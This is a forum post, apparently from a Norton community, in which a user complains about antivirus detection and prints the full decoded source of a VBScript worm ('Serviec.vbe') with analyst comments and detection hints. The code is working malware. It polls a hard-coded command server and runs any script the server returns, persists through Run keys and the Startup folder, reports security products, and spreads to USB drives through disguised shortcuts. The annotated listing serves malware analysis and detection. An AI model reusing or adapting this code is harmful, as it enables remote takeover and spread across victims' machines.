Irresponsiveness of Symantec Lab. for New Virus Signature

It's very unfortunate that our organisation is suffering from the spread of a virus which is undetectable by Norton Antivirus. I checked using the VirusTotal website and found that many AV systems do not detect this virus.

I had uploaded the virus file to Symantec as a specimen. Even today it's not detectable by Norton Antivirus.

 

I started decoding it myself. The file name is Serviec.vbe; for uploading here I changed it to Serviec-vbe.txt. It's an encrypted (more precisely, encoded) Visual Basic script. The original file is also attached. Here is the script after decoding the original file via the GreyMagic website ( http://www.greymagic.com/security/tools/decoder/ ):

Anybody can clearly see it's indeed a virus, which Symantec's scan says is safe.

 

' Analyst annotation: script entry point. Sets up globals, runs the install
' routine (Ins), then polls a remote server forever for instructions.
' Errors are suppressed for the whole script, so failed steps stay silent.
ON error Resume NEXt
Dim Z
' WMI moniker prefix; the namespace name (cimv2, SecurityCenter, ...) is appended by callers.
z="winmgmts:{impersonationLevel=impersonate}!\\.\root\"
dim sh
seT sh=WScriPt.CreateObject("WScript.Shell")
dim fs
Set fs=CreateObject("Scripting.FileSystemObject")
' Hard-coded remote server and TCP port used by post(); both are network indicators
' for proxy/DNS/firewall log searches.
DiM host
host="thescorpionking.no-ip.org"
Dim PoRt
port=1604
' Working directory: the current user's %TEMP% folder, with a trailing backslash.
dim DR
DR=sh.ExpandEnvironmentsTrIngs("%temp%")&"\"
' File name used for every copy of the script and as the Run value name.
dim FN
FN="Serviec.vbe"
dim fh
' "~" is a placeholder meaning "marker not read yet"; Ins replaces it.
dim us
us="~"
Ins
Dim i
i=0
' Polling loop: every 4 seconds POST to /ready and split the reply on the
' literal delimiter "Scorp" into a command word and its argument.
WhiLe tRue
Dim a
A=splIt(post("ready",""),"Scorp")
SeleCt case a(0)
' "exc": the second field of the server reply is run as VBScript via Execute,
' i.e. the server can run arbitrary code in this user's context. A host that
' ran this script should be treated as fully compromised, not merely infected.
Case"exc"
dim Sa
sa=a(1)
a(0)=""
execute sa
' "uns": calls uns, which only quits the script host (see that function).
case"uns"
uns
End SelecT
WScRipt.sleEp 4000
i=i+1
' Every third iteration (i goes 1,2,3 -> reset) re-run xins, which rewrites
' the persistence entries and re-copies the script to removable drives.
if i>2 Then
i=0
xins
end if
Wend
' Analyst annotation: handler for the server's "uns" command. In the visible
' code it only terminates the script host; it deletes no Run values, file
' copies or shortcuts, so those artefacts remain for clean-up.
FuNctiOn uns
WScript.quit
End FuNction
' Analyst annotation: sends one synchronous HTTP POST to the hard-coded
' server and returns the response body as a string.
'   cmD - appended to the URL as the path ("ready" in the main loop)
'   da  - request body
' The request is plain http:// (no TLS), so the path, header and body are
' visible to network monitoring. The host profile string from inf is sent in
' a request header on every call.
FuncTion poSt(cmD,da)
PosT=""
DIm o
Set o=creatEObJECt("MSXML2.XMLHTTP")
' Third argument False = synchronous call; the script blocks until the server answers.
o.OpeN"POST","http://"& host&":"&port&"/"&cmd,fAlse
' NOTE(review): the header name appears here as "\User\"; this may be an
' artefact of decoding rather than the literal name sent - confirm against a capture.
O.setreqUeStHeader"\User\",inf
o.SEnd Da
post=o.responseText
End fUncTion
' Analyst annotation: persistence and removable-drive propagation routine.
' Called once from ins and then periodically from the main loop.
' Artefacts visible in this code, useful for detection and clean-up:
'   - Run values named after fn under HKCU and HKLM pointing at the %TEMP% copy
'   - a copy of the script in the folder returned by Shell.Application NameSpace(&H7)
'     (the per-user Startup folder)
'   - on removable drives: a copy of the script in the root, original root
'     files set to Hidden, and a "<file>.lnk" per file whose target is cmd.exe
sUB xiNs
' Local z shadows the global WMI prefix inside this sub only.
dim z
z="Software\Microsoft\Windows\CurrentVersion"
On Error resume neXt
' Autostart at logon: value data is the quoted path dr&fn (ChrW(34) is a double quote).
sh.regwrIte"HKCU\"&z&"\Run\"&fn,cHRw(34)&dr&Fn&cHRw(34),"REG_SZ"
sh.regWriTe"HKLM\"&z&"\Run\"&fN,chrw(34)&dr&fn&ChRw(34),"REG_SZ"
Dim y
y=z&"\Explorer\Advanced\"
' The next six lines target Explorer view settings (hidden files, file
' extensions, Folder Options menu).
' NOTE(review): they call methods on "S", which is not defined anywhere in
' the visible listing (the shell object is "sh"), and two value names are
' written with a leading space. Under On Error Resume Next they may have no
' effect, so the absence of these values does not rule out infection - verify on a sample host.
S.ReGDeLetE"HKCU\"&y&"Hidden"
S.RegWrite"HKCU\"&Y&"Hidden",0,"REG_DWORD"
S.ReGDelETe"HKCU\"&y&" HideFileExt"
S.regWrite"HKCU\"&Y&" HideFileExt",1,"REG_DWORD"
s.RegWriTE"HKCU\"&z&"\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"
S.REgWrite"HKLM\"&z&"\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"
' Second persistence path: copy the running script into the Startup folder (overwrite = true).
fs.coPyfile wscript.scriptFullname,CReateObject("Shell.Application").NameSPacE(&H7).Self.PATh&"\"&fn,true
' Walk every drive; only ready drives with free space and DriveType 1
' (removable, per the FileSystemObject constants) are touched.
for each Xx In fs.DrIves
if xx.Isready thEn
if xx.freeSpaCe>0 then
if xx.drivetype=1 then
' Reset attributes on an existing copy so the overwrite below can succeed.
if fs.FILeexists(xx.path&"\"&fn)then
fS.gEtfile(xx.path&"\"&Fn).Attributes=0
eND if
fs.coPyfiLe Dr&fn,Xx.Path&"\"&fn,truE
' Only files directly in the drive root are processed (no recursion into folders).
For Each X IN fs.GetFoldEr(xx.patH&"\").files
wscript.sleep 1
if instr(x.name,".")then
' Skip existing .lnk files; compare on the text after the last dot.
if lcAse(Split(x.naMe,".")(UBouNd(split(x.naMe,"."))))<>"lnk"then
' Attributes=2 marks the file Hidden (this includes the script copy itself).
x.atTRibuTes=2
if ucase(x.name)<>ucase(fN)then
' For each original file, create "<name>.lnk" next to it. The shortcut runs
' cmd.exe, which starts the script copy and then the original file, so the
' user still sees the document open. Detection hint: .lnk files in a drive
' root with TargetPath cmd.exe and "/c start" arguments.
With Sh.CreateShoRtcut(xx.Path&"\"&x.name&".lnk")
.TArgetPath="cmd.exe"
.WoRKINgDirectorY=""
.Arguments="/c start "&ReplacE(fn," ",ChrW(34)&" "&ChrW(34))&"&start "&replacE(x.name," ",ChrW(34)&" "&ChrW(34))&" & exit"
' Icon is looked up from the file type's DefaultIcon registry entry so the
' shortcut resembles the file it replaces in the listing.
.IconLocatiOn=sH.REgreAd("HKLM\SOFTWARE\Classes\"&sh.regread("HKLM\SOFTWARE\Classes\."&Split(x.name,".")(UBound(Split(X.name,".")))&"\")&"\DefaultIcon\")
if insTr(.iconLocAtion,",")=0 then
.iconloCaTion=.iCONlOcaTion&",0"
enD if
.SAve()
end wITh
end if
eNd if
end if
Next
eNd if
eNd if
eNd if
next
Err.ClEar
eNd sub
' Analyst annotation: xInf caches the host profile string built by inf.
Dim xInf
' Builds (once) and returns a backslash-separated profile of the infected
' host, which post() sends to the server in a request header. Fields, in
' order: volume serial (HWD), computer name, user name, OS string (Os), the
' literal "0.02", the us marker, parent process id (pid), security products
' (anti), country code (sCountry) and ACt.
' Each field is pre-set to "??" so a failed lookup leaves "??" in its place.
FuncTioN inf
ON Error reSUmE next
IF xinf=""tHen
DIm s
s="??"
s=HWD
inf=iNf&s&"\"
s="??"
s=sh.EXpandEnvironmEnTStrings("%COMPUTERNAME%")
inF=inf&S&"\"
s="??"
S=Sh.EXpAndEnvironmenTstrings("%USERNAME%")
iNf=inf&s&"\"
s="??"
' NOTE(review): "0.02" is presumably a build/version tag, and ACt is not
' defined anywhere in the visible listing - confirm against the original sample.
inf=Inf& Os&"\\0.02\"&us&"\"&pid&"\"&anti("antivirusProduct")&"/"&ANti("FireWallProduct")&"\"&sCoUntry&"\"&ACt
xiNf=inf
Else
' Subsequent calls reuse the cached string, so the lookups above run once per process.
iNf=xinf
eNd If
end FuncTion
' Analyst annotation: queries the WMI root\SecurityCenter namespace for the
' class named in an ("antivirusProduct" or "FireWallProduct" at the call
' sites) and returns a displayName; if several instances exist the last one
' enumerated wins. The result is reported to the server as part of inf, i.e.
' the operator learns which security products are registered on the host.
FuNcTion anti(an)
on ErRor ResUme NeXt
Set b=GetOBjeCt(z&"SecurityCenter")
' Flags 48 = return immediately + forward-only enumeration.
SeT bb=b.ExecQuery("Select * From "&an,,48)
For EaCh bBb In BB
Anti=bbb.dispLAyNamE
nExt
end function
' Analyst annotation: reads the iCountry value from
' HKCU\Control Panel\International through the WMI StdRegProv provider
' (&H80000001 is HKEY_CURRENT_USER) and returns it as the function result.
function sCountRY
Set R=GetObject(z&"default:StdRegProv")
R.GetStriNgvalue&H80000001,"Control Panel\International","iCountry",SCountrY
End fUnction
' Analyst annotation: returns an OS description for the host profile:
' Win32_OperatingSystem Caption + CSDVersion (service pack text) + an
' architecture tag.
FuncTion OS
DiM v
v=sh.ExpanDENvironmentstRiNGS("%programfiles%")
dim r
' Architecture guess: if %programfiles% contains "x86" (case-insensitive)
' the tag is " x64 ", otherwise " x86 ".
r=InStr(1,V,"x86",vbTExtcOmpare)
if R=0 THEn
r=" x86 "
Else
r=" x64 "
END If
Set a=getObject(z&"cimv2")
Set V=a.ExecQueRy("Select * from Win32_OperatingSystem")
' Only the first returned instance is used.
For eaCh C IN v
OS=c.captioN&c.CSDVeRSIon&r
Exit for
Next
End FUnction
' Analyst annotation: determines the process id of the running script host.
' It launches mshta.exe with no arguments, looks up that child in
' Win32_Process and returns its ParentProcessId; 0 is the fallback value.
' Detection hint: a script host (wscript/cscript) spawning a bare mshta.exe
' child is visible in process-creation logs.
FunctIOn PId
PID=0
PID=GetObject(z&"cimv2").Get("Win32_Process.Handle='"&sh.Exec("mshta.exe").ProceSsID&"'").ParentProcESsiD
end Function
' Analyst annotation: first-run install routine, called once at start-up.
' It records how the host was infected, copies the script to %TEMP% and
' hands over to xins. Artefact: registry value HKCU\Software\sc ("y" or "n").
FUnctiON ins
On error resume next
' If the marker value is missing the read fails and us keeps its "~" placeholder.
us=sH.regrEad("HKCU\Software\sc")
if us="~"tHen
' Path from the 2nd character onward equals ":\<fn>" only when the script
' runs from the root of a drive; that case is recorded as "y", any other as "n".
if lcase(mid(wscripT.scRiPtfullnaMe,2))=":\"&lcase(fn)tHen
us="y"
Sh.reGwrite"HKCU\Software\sc",us,"REG_SZ"
Else
uS="n"
Sh.regwrite"HKCU\Software\sc",us,"REG_SZ"
end if
ENd if
ErR.clear
fS.copyfilE wscript.scRiptfullname,dR&fn,truE
' Opens the %TEMP% copy for appending (mode 8, do not create) and keeps the
' handle in the global fh. If either the copy or the open raised an error
' the script exits.
' NOTE(review): presumably this keeps the file open/locked and stops a second
' instance from running - confirm by observing behaviour on a test host.
set fH=Fs.OpenTextFIle(Dr&fn,8,falSe)
if Err.NUMber>0 theN
WscRipt.quIt
end iF
xinS
end function
' Analyst annotation: returns the first non-empty VolumeSerialNumber reported
' by Win32_LogicalDisk. inf uses it as the first field of the host profile,
' so it serves as the identifier the server sees for this machine.
functiOn HWD
SEt a=GetObjEct("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set aa=a.ExeCquery("SELECT * FROM Win32_LogicalDisk")
for EaCh Aaa In aa
if aaa.VoLumeSerialNUMBer<>""tHen
HWd=aaa.VOlUmeSErialNumber
eXit for
End if
Next
enD function


[Edit: Removed infected attachment to conform with the Participation Guidelines and Terms of Service]